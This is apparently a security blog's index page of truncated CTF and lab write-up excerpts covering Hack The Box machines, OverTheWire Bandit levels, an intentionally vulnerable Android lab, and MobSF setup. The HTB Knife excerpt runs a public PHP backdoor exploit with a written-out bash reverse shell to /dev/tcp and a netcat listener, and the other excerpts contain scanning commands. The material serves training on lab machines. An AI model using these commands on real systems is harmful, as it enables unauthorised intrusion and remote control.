HTB Knife

$ nmap 10.10.10.242 $ nmap 10.10.10.242 -p- -v http://10.10.10.242/ $ whatweb 10.10.10.242 $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/49933.py $ python3 49933.py $ id Using this exploit we get a reverse shell, but it is not very useful, so we can try to get a better one. https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html $ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'" $ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /home james@knife:/home$ ls james@knife:/home$

EVABS (Extremely Vulnerable Android Labs)

According to https://github.com/abhi-r3v0/EVABS: An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn http://10.10.10.245/ Dashboard Security Snapshot IP Config Network status Security Snapshot http://10.10.10.245/data/1 Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

Bandit CTF – Level 12

Level 11–>12 bandit11@bandit:~$ ls -la bandit11@bandit:~$ cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m' password = 5Te8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds. We can use it to perform a full port scan and then feed the results to Nmap. https://github.com/RustScan/RustScan $ rustscan -a 10.10.10.247 $ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777 In the port scan, we found different open ports. As usual, ssh port is not a common port to start testing so,

HTB Scriptkiddie

$ nmap -A -p- 10.10.10.226 -T4 Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) Accessing http://10.10.10.226:5000/ On this site we can observe that nmap and msfvenom are used. $ searchsploit msfvenom For nmap we don’t get much from searchsploit, but for msfvenom we get just 1 result. So it is worth trying. msf6 > search venom

Bandit CTF – Level 11

level 10–>11 bandit10@bandit:~$ ls -la bandit10@bandit:~$ cat data.txt | base64 -d The password is IFukXXXXXXXXXXXXXXXXXXXXXXXXXXXX Password = IFukXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[Solved] Resolv.conf is not updated after an OpenVPN connection

After connecting to a VPN on Linux (in my case, Ubuntu), resolv.conf is not updated and you can’t resolve names from that network as expected. After searching a bit I found this website that gave me a solution. You can check in detail here: https://dev.to/setevoy/arch-linux-openvpn–resolvconf-is-not-updated-2470 After the connection to the VPN has been established, we can observe that resolv.conf hasn’t been updated. $ cat /etc/resolv.conf Modify your ovpn file and these

Mobile Security Framework (MobSF)

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF Documentation: https://mobsf.github.io/docs/#/ Linux requirements: Install Git: sudo apt-get install git Install Python 3.8-3.9: sudo apt-get install python3.8 Install JDK 8+: sudo apt-get install openjdk-8-jdk Install the following dependencies: sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdf For the

Bandit CTF – Level 10

level 9–>10 bandit9@bandit:~$ ls -la bandit9@bandit:~$ strings data.txt | grep "^=" password = truKXXXXXXXXXXXXXXXXXXXXXXXXXXXX